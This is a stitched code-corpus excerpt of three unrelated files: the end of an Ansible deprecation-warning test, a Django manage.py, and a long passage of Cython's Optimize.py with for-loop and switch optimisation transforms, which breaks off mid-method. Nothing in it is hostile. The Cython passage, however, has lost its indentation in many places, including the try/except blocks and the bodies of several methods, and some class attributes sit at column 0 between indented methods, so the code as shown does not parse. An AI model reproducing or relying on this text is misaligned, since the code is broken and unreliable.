        {u'msg': u'deprecation8', u'date': '2020-03-10', u'collection_name': 'ansible.builtin'},
        {u'msg': u'deprecation9', u'version': None, u'collection_name': None},
        {u'msg': u'deprecation10', u'version': '2.4', u'collection_name': None},
    ]
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_deprecate_without_list(am, capfd):
    """A bare string passed as deprecations= is wrapped into one entry."""
    with pytest.raises(SystemExit):
        am.exit_json(deprecations='Simple deprecation warning')

    stdout, _ = capfd.readouterr()
    result = json.loads(stdout)
    assert result.get('warnings', []) == []
    assert result['deprecations'] == [
        {u'msg': u'Simple deprecation warning', u'version': None, u'collection_name': None},
    ]
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_deprecate_version_and_date(am, capfd):
    """Passing both version= and date= must trigger the internal assertion.

    Renamed from ``test_deprecate_without_list``: the original name duplicated
    the test directly above, so Python's module namespace (and therefore
    pytest collection) silently dropped one of the two tests.
    """
    with pytest.raises(AssertionError) as ctx:
        am.deprecate('Simple deprecation warning', date='', version='')
    assert ctx.value.args[0] == "implementation error -- version and date must not both be set"
| dmsimard/ansible | test/units/module_utils/basic/test_deprecate_warn.py | Python | gpl-3.0 | 3,387 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Standard Django management entry point for the ceph_db_viewer project:
    # point DJANGO_SETTINGS_MODULE at the project settings (unless the caller
    # already set one) and dispatch the command-line arguments to Django.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ceph_db_viewer.settings")
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
| accelazh/ceph_db_viewer | manage.py | Python | mit | 257 |
from __future__ import absolute_import
from . import TypeSlots
from .ExprNodes import not_a_constant
import cython
cython.declare(UtilityCode=object, EncodedString=object, BytesLiteral=object,
Nodes=object, ExprNodes=object, PyrexTypes=object, Builtin=object,
UtilNodes=object)
from . import Nodes
from . import ExprNodes
from . import PyrexTypes
from . import Visitor
from . import Builtin
from . import UtilNodes
from . import Options
from .Code import UtilityCode
from .StringEncoding import EncodedString, BytesLiteral
from .Errors import error
from .ParseTreeTransforms import SkipDeclarations
import copy
import codecs
try:
from __builtin__ import reduce
except ImportError:
from functools import reduce
try:
from __builtin__ import basestring
except ImportError:
basestring = str # Python 3
def load_c_utility(name):
    """Return the cached utility-code block *name* from Optimize.c."""
    utility = UtilityCode.load_cached(name, "Optimize.c")
    return utility
def unwrap_coerced_node(node, coercion_nodes=(ExprNodes.CoerceToPyTypeNode, ExprNodes.CoerceFromPyTypeNode)):
    """Strip a single layer of Python<->C coercion from *node*, if present."""
    return node.arg if isinstance(node, coercion_nodes) else node
def unwrap_node(node):
    """Follow ResultRefNode indirections down to the underlying expression."""
    unwrapped = node
    while isinstance(unwrapped, UtilNodes.ResultRefNode):
        unwrapped = unwrapped.expression
    return unwrapped
def is_common_value(a, b):
    """Conservatively decide whether two expression nodes denote the same value.

    Only plain names and non-Python attribute chains are compared; anything
    else yields False.
    """
    lhs = unwrap_node(a)
    rhs = unwrap_node(b)
    if isinstance(lhs, ExprNodes.NameNode) and isinstance(rhs, ExprNodes.NameNode):
        return lhs.name == rhs.name
    if isinstance(lhs, ExprNodes.AttributeNode) and isinstance(rhs, ExprNodes.AttributeNode):
        return (not lhs.is_py_attr
                and is_common_value(lhs.obj, rhs.obj)
                and lhs.attribute == rhs.attribute)
    return False
def filter_none_node(node):
    """Map a node whose constant value is None to None itself; pass all others through."""
    if node is None or node.constant_result is not None:
        return node
    return None
class IterationTransform(Visitor.EnvTransform):
    """Transform some common for-in loop patterns into efficient C loops:

    - for-in-dict loop becomes a while loop calling PyDict_Next()
    - for-in-enumerate is replaced by an external counter variable
    - for-in-range loop becomes a plain C for loop
    """
    def visit_PrimaryCmpNode(self, node):
        """Rewrite ``x in c_array`` membership tests into an explicit search loop.

        ``in`` against a C pointer/array cannot use the Python sequence
        protocol, so it is expanded into a for-in loop with an equality
        test and a break, collecting the result in a temp.
        """
        if node.is_ptr_contains():

            # for t in operand2:
            #     if operand1 == t:
            #         res = True
            #         break
            # else:
            #     res = False

            pos = node.pos
            result_ref = UtilNodes.ResultRefNode(node)
            if isinstance(node.operand2, ExprNodes.IndexNode):
                base_type = node.operand2.base.type.base_type
            else:
                base_type = node.operand2.type.base_type
            target_handle = UtilNodes.TempHandle(base_type)
            target = target_handle.ref(pos)
            cmp_node = ExprNodes.PrimaryCmpNode(
                pos, operator=u'==', operand1=node.operand1, operand2=target)
            if_body = Nodes.StatListNode(
                pos,
                stats = [Nodes.SingleAssignmentNode(pos, lhs=result_ref, rhs=ExprNodes.BoolNode(pos, value=1)),
                         Nodes.BreakStatNode(pos)])
            if_node = Nodes.IfStatNode(
                pos,
                if_clauses=[Nodes.IfClauseNode(pos, condition=cmp_node, body=if_body)],
                else_clause=None)
            for_loop = UtilNodes.TempsBlockNode(
                pos,
                temps = [target_handle],
                body = Nodes.ForInStatNode(
                    pos,
                    target=target,
                    iterator=ExprNodes.IteratorNode(node.operand2.pos, sequence=node.operand2),
                    body=if_node,
                    else_clause=Nodes.SingleAssignmentNode(pos, lhs=result_ref, rhs=ExprNodes.BoolNode(pos, value=0))))
            # Analyse and re-visit so the generated loop itself gets optimised.
            for_loop = for_loop.analyse_expressions(self.current_env())
            for_loop = self.visit(for_loop)
            new_node = UtilNodes.TempResultFromStatNode(result_ref, for_loop)

            if node.operator == 'not_in':
                new_node = ExprNodes.NotNode(pos, operand=new_node)
            return new_node

        else:
            self.visitchildren(node)
            return node
    def visit_ForInStatNode(self, node):
        # Transform the children first, then try to specialise the loop itself.
        self.visitchildren(node)
        return self._optimise_for_loop(node, node.iterator.sequence)
    def _optimise_for_loop(self, node, iterator, reversed=False):
        """Dispatch a for-in loop to the matching specialised transform.

        Handles dicts, C arrays/pointers, bytes, unicode, and the builtins
        enumerate()/reversed()/range(); returns *node* unchanged when no
        specialisation applies.
        """
        if iterator.type is Builtin.dict_type:
            # like iterating over dict.keys()
            if reversed:
                # CPython raises an error here: not a sequence
                return node
            return self._transform_dict_iteration(
                node, dict_obj=iterator, method=None, keys=True, values=False)

        # C array (slice) iteration?
        if iterator.type.is_ptr or iterator.type.is_array:
            return self._transform_carray_iteration(node, iterator, reversed=reversed)
        if iterator.type is Builtin.bytes_type:
            return self._transform_bytes_iteration(node, iterator, reversed=reversed)
        if iterator.type is Builtin.unicode_type:
            return self._transform_unicode_iteration(node, iterator, reversed=reversed)

        # the rest is based on function calls
        if not isinstance(iterator, ExprNodes.SimpleCallNode):
            return node

        if iterator.args is None:
            arg_count = iterator.arg_tuple and len(iterator.arg_tuple.args) or 0
        else:
            arg_count = len(iterator.args)
            # bound method call: 'self' does not count as an argument
            if arg_count and iterator.self is not None:
                arg_count -= 1

        function = iterator.function
        # dict iteration?
        if function.is_attribute and not reversed and not arg_count:
            base_obj = iterator.self or function.obj
            method = function.attribute
            # in Py3, items() is equivalent to Py2's iteritems()
            is_safe_iter = self.global_scope().context.language_level >= 3

            if not is_safe_iter and method in ('keys', 'values', 'items'):
                # try to reduce this to the corresponding .iter*() methods
                if isinstance(base_obj, ExprNodes.SimpleCallNode):
                    inner_function = base_obj.function
                    if (inner_function.is_name and inner_function.name == 'dict'
                            and inner_function.entry
                            and inner_function.entry.is_builtin):
                        # e.g. dict(something).items() => safe to use .iter*()
                        is_safe_iter = True

            keys = values = False
            if method == 'iterkeys' or (is_safe_iter and method == 'keys'):
                keys = True
            elif method == 'itervalues' or (is_safe_iter and method == 'values'):
                values = True
            elif method == 'iteritems' or (is_safe_iter and method == 'items'):
                keys = values = True

            if keys or values:
                return self._transform_dict_iteration(
                    node, base_obj, method, keys, values)

        # enumerate/reversed ?
        if iterator.self is None and function.is_name and \
               function.entry and function.entry.is_builtin:
            if function.name == 'enumerate':
                if reversed:
                    # CPython raises an error here: not a sequence
                    return node
                return self._transform_enumerate_iteration(node, iterator)
            elif function.name == 'reversed':
                if reversed:
                    # CPython raises an error here: not a sequence
                    return node
                return self._transform_reversed_iteration(node, iterator)

        # range() iteration?
        if Options.convert_range and node.target.type.is_int:
            if iterator.self is None and function.is_name and \
                   function.entry and function.entry.is_builtin and \
                   function.name in ('range', 'xrange'):
                return self._transform_range_iteration(node, iterator, reversed=reversed)

        return node
    def _transform_reversed_iteration(self, node, reversed_function):
        """Unpack ``for x in reversed(seq)`` into reversed iteration over seq."""
        args = reversed_function.arg_tuple.args
        if len(args) == 0:
            error(reversed_function.pos,
                  "reversed() requires an iterable argument")
            return node
        elif len(args) > 1:
            error(reversed_function.pos,
                  "reversed() takes exactly 1 argument")
            return node
        arg = args[0]

        # reversed(list/tuple) ?
        if arg.type in (Builtin.tuple_type, Builtin.list_type):
            node.iterator.sequence = arg.as_none_safe_node("'NoneType' object is not iterable")
            node.iterator.reversed = True
            return node

        # otherwise retry the whole dispatch with the reversed flag set
        return self._optimise_for_loop(node, arg, reversed=True)
PyBytes_AS_STRING_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_char_ptr_type, [
PyrexTypes.CFuncTypeArg("s", Builtin.bytes_type, None)
])
PyBytes_GET_SIZE_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("s", Builtin.bytes_type, None)
])
    def _transform_bytes_iteration(self, node, slice_node, reversed=False):
        """Iterate over the raw char* buffer of a bytes object.

        Reduces the loop to C array iteration over
        PyBytes_AS_STRING()/PyBytes_GET_SIZE(), guarded against None.
        """
        target_type = node.target.type
        if not target_type.is_int and target_type is not Builtin.bytes_type:
            # bytes iteration returns bytes objects in Py2, but
            # integers in Py3
            return node

        unpack_temp_node = UtilNodes.LetRefNode(
            slice_node.as_none_safe_node("'NoneType' is not iterable"))

        slice_base_node = ExprNodes.PythonCapiCallNode(
            slice_node.pos, "PyBytes_AS_STRING",
            self.PyBytes_AS_STRING_func_type,
            args = [unpack_temp_node],
            is_temp = 0,
            )
        len_node = ExprNodes.PythonCapiCallNode(
            slice_node.pos, "PyBytes_GET_SIZE",
            self.PyBytes_GET_SIZE_func_type,
            args = [unpack_temp_node],
            is_temp = 0,
            )

        return UtilNodes.LetNode(
            unpack_temp_node,
            self._transform_carray_iteration(
                node,
                ExprNodes.SliceIndexNode(
                    slice_node.pos,
                    base = slice_base_node,
                    start = None,
                    step = None,
                    stop = len_node,
                    type = slice_base_node.type,
                    is_temp = 1,
                    ),
                reversed = reversed))
PyUnicode_READ_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ucs4_type, [
PyrexTypes.CFuncTypeArg("kind", PyrexTypes.c_int_type, None),
PyrexTypes.CFuncTypeArg("data", PyrexTypes.c_void_ptr_type, None),
PyrexTypes.CFuncTypeArg("index", PyrexTypes.c_py_ssize_t_type, None)
])
init_unicode_iteration_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_int_type, [
PyrexTypes.CFuncTypeArg("s", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("length", PyrexTypes.c_py_ssize_t_ptr_type, None),
PyrexTypes.CFuncTypeArg("data", PyrexTypes.c_void_ptr_ptr_type, None),
PyrexTypes.CFuncTypeArg("kind", PyrexTypes.c_int_ptr_type, None)
],
exception_value = '-1')
    def _transform_unicode_iteration(self, node, slice_node, reversed=False):
        """Iterate over a unicode string via __Pyx_PyUnicode_READ().

        Literal Latin-1 strings are first reduced to plain byte iteration;
        otherwise a kind/data/length triple is set up once and characters are
        read by index in a C for loop.
        """
        if slice_node.is_literal:
            # try to reduce to byte iteration for plain Latin-1 strings
            try:
                bytes_value = BytesLiteral(slice_node.value.encode('latin1'))
            except UnicodeEncodeError:
                pass
            else:
                bytes_slice = ExprNodes.SliceIndexNode(
                    slice_node.pos,
                    base=ExprNodes.BytesNode(
                        slice_node.pos, value=bytes_value,
                        constant_result=bytes_value,
                        type=PyrexTypes.c_char_ptr_type).coerce_to(
                            PyrexTypes.c_uchar_ptr_type, self.current_env()),
                    start=None,
                    stop=ExprNodes.IntNode(
                        slice_node.pos, value=str(len(bytes_value)),
                        constant_result=len(bytes_value),
                        type=PyrexTypes.c_py_ssize_t_type),
                    type=Builtin.unicode_type,  # hint for Python conversion
                    )
                return self._transform_carray_iteration(node, bytes_slice, reversed)

        unpack_temp_node = UtilNodes.LetRefNode(
            slice_node.as_none_safe_node("'NoneType' is not iterable"))

        start_node = ExprNodes.IntNode(
            node.pos, value='0', constant_result=0, type=PyrexTypes.c_py_ssize_t_type)
        length_temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
        end_node = length_temp.ref(node.pos)
        if reversed:
            relation1, relation2 = '>', '>='
            start_node, end_node = end_node, start_node
        else:
            relation1, relation2 = '<=', '<'

        kind_temp = UtilNodes.TempHandle(PyrexTypes.c_int_type)
        data_temp = UtilNodes.TempHandle(PyrexTypes.c_void_ptr_type)
        counter_temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)

        target_value = ExprNodes.PythonCapiCallNode(
            slice_node.pos, "__Pyx_PyUnicode_READ",
            self.PyUnicode_READ_func_type,
            args = [kind_temp.ref(slice_node.pos),
                    data_temp.ref(slice_node.pos),
                    counter_temp.ref(node.target.pos)],
            is_temp = False,
            )
        if target_value.type != node.target.type:
            target_value = target_value.coerce_to(node.target.type,
                                                  self.current_env())
        target_assign = Nodes.SingleAssignmentNode(
            pos = node.target.pos,
            lhs = node.target,
            rhs = target_value)
        body = Nodes.StatListNode(
            node.pos,
            stats = [target_assign, node.body])

        loop_node = Nodes.ForFromStatNode(
            node.pos,
            bound1=start_node, relation1=relation1,
            target=counter_temp.ref(node.target.pos),
            relation2=relation2, bound2=end_node,
            step=None, body=body,
            else_clause=node.else_clause,
            from_range=True)

        # initialise length/data/kind once, before entering the loop
        setup_node = Nodes.ExprStatNode(
            node.pos,
            expr = ExprNodes.PythonCapiCallNode(
                slice_node.pos, "__Pyx_init_unicode_iteration",
                self.init_unicode_iteration_func_type,
                args = [unpack_temp_node,
                        ExprNodes.AmpersandNode(slice_node.pos, operand=length_temp.ref(slice_node.pos),
                                                type=PyrexTypes.c_py_ssize_t_ptr_type),
                        ExprNodes.AmpersandNode(slice_node.pos, operand=data_temp.ref(slice_node.pos),
                                                type=PyrexTypes.c_void_ptr_ptr_type),
                        ExprNodes.AmpersandNode(slice_node.pos, operand=kind_temp.ref(slice_node.pos),
                                                type=PyrexTypes.c_int_ptr_type),
                        ],
                is_temp = True,
                result_is_used = False,
                utility_code=UtilityCode.load_cached("unicode_iter", "Optimize.c"),
                ))
        return UtilNodes.LetNode(
            unpack_temp_node,
            UtilNodes.TempsBlockNode(
                node.pos, temps=[counter_temp, length_temp, data_temp, kind_temp],
                body=Nodes.StatListNode(node.pos, stats=[setup_node, loop_node])))
def _transform_carray_iteration(self, node, slice_node, reversed=False):
neg_step = False
if isinstance(slice_node, ExprNodes.SliceIndexNode):
slice_base = slice_node.base
start = filter_none_node(slice_node.start)
stop = filter_none_node(slice_node.stop)
step = None
if not stop:
if not slice_base.type.is_pyobject:
error(slice_node.pos, "C array iteration requires known end index")
return node
elif isinstance(slice_node, ExprNodes.IndexNode):
assert isinstance(slice_node.index, ExprNodes.SliceNode)
slice_base = slice_node.base
index = slice_node.index
start = filter_none_node(index.start)
stop = filter_none_node(index.stop)
step = filter_none_node(index.step)
if step:
if not isinstance(step.constant_result, (int,long)) \
or step.constant_result == 0 \
or step.constant_result > 0 and not stop \
or step.constant_result < 0 and not start:
if not slice_base.type.is_pyobject:
error(step.pos, "C array iteration requires known step size and end index")
return node
else:
# step sign is handled internally by ForFromStatNode
step_value = step.constant_result
if reversed:
step_value = -step_value
neg_step = step_value < 0
step = ExprNodes.IntNode(step.pos, type=PyrexTypes.c_py_ssize_t_type,
value=str(abs(step_value)),
constant_result=abs(step_value))
elif slice_node.type.is_array:
if slice_node.type.size is None:
error(slice_node.pos, "C array iteration requires known end index")
return node
slice_base = slice_node
start = None
stop = ExprNodes.IntNode(
slice_node.pos, value=str(slice_node.type.size),
type=PyrexTypes.c_py_ssize_t_type, constant_result=slice_node.type.size)
step = None
else:
if not slice_node.type.is_pyobject:
error(slice_node.pos, "C array iteration requires known end index")
return node
if start:
start = start.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
if stop:
stop = stop.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
if stop is None:
if neg_step:
stop = ExprNodes.IntNode(
slice_node.pos, value='-1', type=PyrexTypes.c_py_ssize_t_type, constant_result=-1)
else:
error(slice_node.pos, "C array iteration requires known step size and end index")
return node
if reversed:
if not start:
start = ExprNodes.IntNode(slice_node.pos, value="0", constant_result=0,
type=PyrexTypes.c_py_ssize_t_type)
# if step was provided, it was already negated above
start, stop = stop, start
ptr_type = slice_base.type
if ptr_type.is_array:
ptr_type = ptr_type.element_ptr_type()
carray_ptr = slice_base.coerce_to_simple(self.current_env())
if start and start.constant_result != 0:
start_ptr_node = ExprNodes.AddNode(
start.pos,
operand1=carray_ptr,
operator='+',
operand2=start,
type=ptr_type)
else:
start_ptr_node = carray_ptr
if stop and stop.constant_result != 0:
stop_ptr_node = ExprNodes.AddNode(
stop.pos,
operand1=ExprNodes.CloneNode(carray_ptr),
operator='+',
operand2=stop,
type=ptr_type
).coerce_to_simple(self.current_env())
else:
stop_ptr_node = ExprNodes.CloneNode(carray_ptr)
counter = UtilNodes.TempHandle(ptr_type)
counter_temp = counter.ref(node.target.pos)
if slice_base.type.is_string and node.target.type.is_pyobject:
# special case: char* -> bytes/unicode
if slice_node.type is Builtin.unicode_type:
target_value = ExprNodes.CastNode(
ExprNodes.DereferenceNode(
node.target.pos, operand=counter_temp,
type=ptr_type.base_type),
PyrexTypes.c_py_ucs4_type).coerce_to(
node.target.type, self.current_env())
else:
# char* -> bytes coercion requires slicing, not indexing
target_value = ExprNodes.SliceIndexNode(
node.target.pos,
start=ExprNodes.IntNode(node.target.pos, value='0',
constant_result=0,
type=PyrexTypes.c_int_type),
stop=ExprNodes.IntNode(node.target.pos, value='1',
constant_result=1,
type=PyrexTypes.c_int_type),
base=counter_temp,
type=Builtin.bytes_type,
is_temp=1)
elif node.target.type.is_ptr and not node.target.type.assignable_from(ptr_type.base_type):
# Allow iteration with pointer target to avoid copy.
target_value = counter_temp
else:
# TODO: can this safely be replaced with DereferenceNode() as above?
target_value = ExprNodes.IndexNode(
node.target.pos,
index=ExprNodes.IntNode(node.target.pos, value='0',
constant_result=0,
type=PyrexTypes.c_int_type),
base=counter_temp,
is_buffer_access=False,
type=ptr_type.base_type)
if target_value.type != node.target.type:
target_value = target_value.coerce_to(node.target.type,
self.current_env())
target_assign = Nodes.SingleAssignmentNode(
pos = node.target.pos,
lhs = node.target,
rhs = target_value)
body = Nodes.StatListNode(
node.pos,
stats = [target_assign, node.body])
relation1, relation2 = self._find_for_from_node_relations(neg_step, reversed)
for_node = Nodes.ForFromStatNode(
node.pos,
bound1=start_ptr_node, relation1=relation1,
target=counter_temp,
relation2=relation2, bound2=stop_ptr_node,
step=step, body=body,
else_clause=node.else_clause,
from_range=True)
return UtilNodes.TempsBlockNode(
node.pos, temps=[counter],
body=for_node)
    def _transform_enumerate_iteration(self, node, enumerate_function):
        """Replace ``for i, x in enumerate(seq[, start])`` by an external counter.

        The counter is kept in a LetRefNode and incremented at the top of the
        loop body; iteration then proceeds over the plain sequence, which may
        enable further specialisation.
        """
        args = enumerate_function.arg_tuple.args
        if len(args) == 0:
            error(enumerate_function.pos,
                  "enumerate() requires an iterable argument")
            return node
        elif len(args) > 2:
            error(enumerate_function.pos,
                  "enumerate() takes at most 2 arguments")
            return node

        if not node.target.is_sequence_constructor:
            # leave this untouched for now
            return node
        targets = node.target.args
        if len(targets) != 2:
            # leave this untouched for now
            return node
        enumerate_target, iterable_target = targets
        counter_type = enumerate_target.type

        if not counter_type.is_pyobject and not counter_type.is_int:
            # nothing we can do here, I guess
            return node

        if len(args) == 2:
            start = unwrap_coerced_node(args[1]).coerce_to(counter_type, self.current_env())
        else:
            start = ExprNodes.IntNode(enumerate_function.pos,
                                      value='0',
                                      type=counter_type,
                                      constant_result=0)
        temp = UtilNodes.LetRefNode(start)

        inc_expression = ExprNodes.AddNode(
            enumerate_function.pos,
            operand1 = temp,
            operand2 = ExprNodes.IntNode(node.pos, value='1',
                                         type=counter_type,
                                         constant_result=1),
            operator = '+',
            type = counter_type,
            #inplace = True,   # not worth using in-place operation for Py ints
            is_temp = counter_type.is_pyobject
            )

        loop_body = [
            Nodes.SingleAssignmentNode(
                pos = enumerate_target.pos,
                lhs = enumerate_target,
                rhs = temp),
            Nodes.SingleAssignmentNode(
                pos = enumerate_target.pos,
                lhs = temp,
                rhs = inc_expression)
            ]

        if isinstance(node.body, Nodes.StatListNode):
            node.body.stats = loop_body + node.body.stats
        else:
            loop_body.append(node.body)
            node.body = Nodes.StatListNode(
                node.body.pos,
                stats = loop_body)

        node.target = iterable_target
        node.item = node.item.coerce_to(iterable_target.type, self.current_env())
        node.iterator.sequence = args[0]

        # recurse into loop to check for further optimisations
        return UtilNodes.LetNode(temp, self._optimise_for_loop(node, node.iterator.sequence))
def _find_for_from_node_relations(self, neg_step_value, reversed):
if reversed:
if neg_step_value:
return '<', '<='
else:
return '>', '>='
else:
if neg_step_value:
return '>=', '>'
else:
return '<=', '<'
def _transform_range_iteration(self, node, range_function, reversed=False):
args = range_function.arg_tuple.args
if len(args) < 3:
step_pos = range_function.pos
step_value = 1
step = ExprNodes.IntNode(step_pos, value='1', constant_result=1)
else:
step = args[2]
step_pos = step.pos
if not isinstance(step.constant_result, (int, long)):
# cannot determine step direction
return node
step_value = step.constant_result
if step_value == 0:
# will lead to an error elsewhere
return node
step = ExprNodes.IntNode(step_pos, value=str(step_value),
constant_result=step_value)
if len(args) == 1:
bound1 = ExprNodes.IntNode(range_function.pos, value='0',
constant_result=0)
bound2 = args[0].coerce_to_integer(self.current_env())
else:
bound1 = args[0].coerce_to_integer(self.current_env())
bound2 = args[1].coerce_to_integer(self.current_env())
relation1, relation2 = self._find_for_from_node_relations(step_value < 0, reversed)
bound2_ref_node = None
if reversed:
bound1, bound2 = bound2, bound1
abs_step = abs(step_value)
if abs_step != 1:
if (isinstance(bound1.constant_result, (int, long)) and
isinstance(bound2.constant_result, (int, long))):
# calculate final bounds now
if step_value < 0:
begin_value = bound2.constant_result
end_value = bound1.constant_result
bound1_value = begin_value - abs_step * ((begin_value - end_value - 1) // abs_step) - 1
else:
begin_value = bound1.constant_result
end_value = bound2.constant_result
bound1_value = end_value + abs_step * ((begin_value - end_value - 1) // abs_step) + 1
bound1 = ExprNodes.IntNode(
bound1.pos, value=str(bound1_value), constant_result=bound1_value,
type=PyrexTypes.spanning_type(bound1.type, bound2.type))
else:
# evaluate the same expression as above at runtime
bound2_ref_node = UtilNodes.LetRefNode(bound2)
spanning_type = PyrexTypes.spanning_type(bound1.type, bound2.type)
spanning_step_type = PyrexTypes.spanning_type(spanning_type, step.type)
if step_value < 0:
begin_value = bound2_ref_node
end_value = bound1
final_op = '-'
else:
begin_value = bound1
end_value = bound2_ref_node
final_op = '+'
bound1 = ExprNodes.binop_node(
bound1.pos,
operand1=ExprNodes.binop_node(
bound1.pos,
operand1=bound2_ref_node,
operator=final_op, # +/-
operand2=ExprNodes.MulNode(
bound1.pos,
operand1=ExprNodes.IntNode(
bound1.pos,
value=str(abs_step),
constant_value=abs_step,
type=spanning_step_type),
operator='*',
operand2=ExprNodes.DivNode(
bound1.pos,
operand1=ExprNodes.SubNode(
bound1.pos,
operand1=ExprNodes.SubNode(
bound1.pos,
operand1=begin_value,
operator='-',
operand2=end_value,
type=spanning_type),
operator='-',
operand2=ExprNodes.IntNode(
bound1.pos,
value='1',
constant_result=1),
type=spanning_step_type),
operator='//',
operand2=ExprNodes.IntNode(
bound1.pos,
value=str(abs_step),
constant_value=abs_step,
type=spanning_step_type),
type=spanning_step_type),
type=spanning_step_type),
type=spanning_step_type),
operator=final_op, # +/-
operand2=ExprNodes.IntNode(
bound1.pos,
value='1',
constant_result=1),
type=spanning_type)
if step_value < 0:
step_value = -step_value
step.value = str(step_value)
step.constant_result = step_value
step = step.coerce_to_integer(self.current_env())
if not bound2.is_literal:
# stop bound must be immutable => keep it in a temp var
bound2_is_temp = True
bound2 = bound2_ref_node or UtilNodes.LetRefNode(bound2)
else:
bound2_is_temp = False
for_node = Nodes.ForFromStatNode(
node.pos,
target=node.target,
bound1=bound1, relation1=relation1,
relation2=relation2, bound2=bound2,
step=step, body=node.body,
else_clause=node.else_clause,
from_range=True)
if bound2_is_temp:
for_node = UtilNodes.LetNode(bound2, for_node)
return for_node
    def _transform_dict_iteration(self, node, dict_obj, method, keys, values):
        """Turn for-in-dict (and .iterkeys/.itervalues/.iteritems) iteration
        into a while loop driven by __Pyx_dict_iterator()/DictIterationNextNode.
        """
        temps = []
        temp = UtilNodes.TempHandle(PyrexTypes.py_object_type)
        temps.append(temp)
        dict_temp = temp.ref(dict_obj.pos)
        temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
        temps.append(temp)
        pos_temp = temp.ref(node.pos)

        key_target = value_target = tuple_target = None
        if keys and values:
            if node.target.is_sequence_constructor:
                if len(node.target.args) == 2:
                    key_target, value_target = node.target.args
                else:
                    # unusual case that may or may not lead to an error
                    return node
            else:
                tuple_target = node.target
        elif keys:
            key_target = node.target
        else:
            value_target = node.target

        if isinstance(node.body, Nodes.StatListNode):
            body = node.body
        else:
            body = Nodes.StatListNode(pos = node.body.pos,
                                      stats = [node.body])

        # keep original length to guard against dict modification
        dict_len_temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
        temps.append(dict_len_temp)
        dict_len_temp_addr = ExprNodes.AmpersandNode(
            node.pos, operand=dict_len_temp.ref(dict_obj.pos),
            type=PyrexTypes.c_ptr_type(dict_len_temp.type))
        temp = UtilNodes.TempHandle(PyrexTypes.c_int_type)
        temps.append(temp)
        is_dict_temp = temp.ref(node.pos)
        is_dict_temp_addr = ExprNodes.AmpersandNode(
            node.pos, operand=is_dict_temp,
            type=PyrexTypes.c_ptr_type(temp.type))

        iter_next_node = Nodes.DictIterationNextNode(
            dict_temp, dict_len_temp.ref(dict_obj.pos), pos_temp,
            key_target, value_target, tuple_target,
            is_dict_temp)
        iter_next_node = iter_next_node.analyse_expressions(self.current_env())
        # the 'next' step runs first in every loop iteration
        body.stats[0:0] = [iter_next_node]

        if method:
            method_node = ExprNodes.StringNode(
                dict_obj.pos, is_identifier=True, value=method)
            dict_obj = dict_obj.as_none_safe_node(
                "'NoneType' object has no attribute '%s'",
                error = "PyExc_AttributeError",
                format_args = [method])
        else:
            method_node = ExprNodes.NullNode(dict_obj.pos)
            dict_obj = dict_obj.as_none_safe_node("'NoneType' object is not iterable")

        def flag_node(value):
            # build a C int literal 1/0 from a Python truth value
            value = value and 1 or 0
            return ExprNodes.IntNode(node.pos, value=str(value), constant_result=value)

        result_code = [
            Nodes.SingleAssignmentNode(
                node.pos,
                lhs = pos_temp,
                rhs = ExprNodes.IntNode(node.pos, value='0',
                                        constant_result=0)),
            Nodes.SingleAssignmentNode(
                dict_obj.pos,
                lhs = dict_temp,
                rhs = ExprNodes.PythonCapiCallNode(
                    dict_obj.pos,
                    "__Pyx_dict_iterator",
                    self.PyDict_Iterator_func_type,
                    utility_code = UtilityCode.load_cached("dict_iter", "Optimize.c"),
                    args = [dict_obj, flag_node(dict_obj.type is Builtin.dict_type),
                            method_node, dict_len_temp_addr, is_dict_temp_addr,
                            ],
                    is_temp=True,
                    )),
            Nodes.WhileStatNode(
                node.pos,
                condition = None,
                body = body,
                else_clause = node.else_clause
                )
            ]

        return UtilNodes.TempsBlockNode(
            node.pos, temps=temps,
            body=Nodes.StatListNode(
                node.pos,
                stats = result_code
                ))
PyDict_Iterator_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("dict", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("is_dict", PyrexTypes.c_int_type, None),
PyrexTypes.CFuncTypeArg("method_name", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("p_orig_length", PyrexTypes.c_py_ssize_t_ptr_type, None),
PyrexTypes.CFuncTypeArg("p_is_dict", PyrexTypes.c_int_ptr_type, None),
])
class SwitchTransform(Visitor.EnvTransform):
    """
    This transformation tries to turn long if statements into C switch statements.
    The requirement is that every clause be an (or of) var == value, where the var
    is common among all clauses and both var and value are ints.
    """
    # Sentinel triple returned whenever a clause cannot be mapped onto a
    # switch case: (not_in, common_var, condition_values).
    NO_MATCH = (None, None, None)

    def extract_conditions(self, cond, allow_not_in):
        # Decompose a single condition into a switch-compatible triple
        # (not_in, tested_var, [case_value_nodes]), or return NO_MATCH.
        # 'allow_not_in' permits negated forms ('!=' / 'not_in').
        while True:
            # unwrap wrapper nodes that do not change the tested value
            if isinstance(cond, (ExprNodes.CoerceToTempNode,
                                 ExprNodes.CoerceToBooleanNode)):
                cond = cond.arg
            elif isinstance(cond, ExprNodes.BoolBinopResultNode):
                cond = cond.arg.arg
            elif isinstance(cond, UtilNodes.EvalWithTempExprNode):
                # this is what we get from the FlattenInListTransform
                cond = cond.subexpression
            elif isinstance(cond, ExprNodes.TypecastNode):
                cond = cond.operand
            else:
                break

        if isinstance(cond, ExprNodes.PrimaryCmpNode):
            if cond.cascade is not None:
                # chained comparisons are not supported
                return self.NO_MATCH
            elif cond.is_c_string_contains() and \
                     isinstance(cond.operand2, (ExprNodes.UnicodeNode, ExprNodes.BytesNode)):
                # "c in 'literal'" => switch over the literal's characters
                not_in = cond.operator == 'not_in'
                if not_in and not allow_not_in:
                    return self.NO_MATCH
